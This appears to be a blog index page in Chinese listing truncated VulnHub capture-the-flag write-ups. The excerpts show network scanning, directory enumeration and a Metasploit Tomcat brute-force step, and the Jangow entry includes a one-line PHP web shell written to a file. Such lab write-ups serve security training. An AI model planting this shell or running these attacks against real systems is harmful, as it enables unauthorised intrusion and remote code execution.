- 2023-07-01vulnhub靶场:EvilBox - One
下载地址:https://www.vulnhub.com/entry/evilbox-one,736/kali:172.88.6.144靶场:172.88.6.94 nmap-T4-sV-P-A172.88.6.94 用dirbhttp://172.88.6.94和 dirsearch-uhttp://172.88.6.94/ 发现类似的网址 dirbhttp://172.88.6.94/secret/-X.php,
- 2023-06-30vulnhub靶场:Deathnote
靶场地址:Deathnote:1~VulnHubKali:172.88.6.144靶场:172.88.6.92arp-scan-l nmap-T4-sV-P-A172.88.6.92 访问web服务时发现会自动跳转到:http://deathnote.vuln/wordpress/页面,但是显示404,想着应该是未配置dns的问题。那就配置下dns信息,win:打开C:\Windows\Syst
- 2023-06-30vulnhub靶场:doubletrouble
靶场地址:doubletrouble:1~VulnHubkali:172.88.6.144靶场:172.88.6.89靶场2:172.88.6.91arp-scan-l nmap-A-sV-T4-p-172.88.6.89 访问ip 使用dirsearch对目标站点进行Web目录爬取dirsearch-uhttp://172.88.6.89/-e* 将图片下载好,放到kali中,自
- 2023-06-28vulnhub靶场:Thales
靶场地址:泰雷兹:1~VulnHubkali:172.88.6.144靶场:172.88.6.81 nmap172.88.6.0/24 nmap-T4-sV-P -A172.88.6.81 访问http://172.88.6.81:8080/,发现是tomcat页面,登录需要账户,所以使用msf爆破下 msfconsolesearchtomcat useauxiliary/scanner/http/t
- 2023-06-26 vulnhun靶场:Red.ova
靶场下载:Red:1~VulnHubkali:172.88.6.144靶场:172.88.6.70 靶场页面是这个,第一次没有找到ip,使用桥接找到了nmap172.88.6.0/24 访问ip 找了很久没有找到有用的信息,在查看代码的时候发现了这个,直接打不开,在本地添加host 直接打开代码没有发现什
- 2023-06-25vulnhun靶场:jangow-01-1.0.1
kali:172.88.6.144靶场:172.88.6.64靶场地址:Jangow:1.0.1~VulnHub 访问ip 点击右上角的buscar 写入一句话:echo'<?phpeval($_POST['shell']);?>'>upfine.php 在wordpress里面有两个文件,分别是config.php、index.html 在/var/www/html/.back
- 2023-06-24vulnhub靶机练习:01-Empire-Lupin-One
这次用的是OracleVMVirtualBox,避免用vmware出现的问题靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/arp-scan-l 扫描ip kali:172.88.6.144靶场:172.88.6.63/1、扫描ipnmap-A-sV-T4-p-172.88.6.63 1.1尝试访问ip 1.2目录扫描 d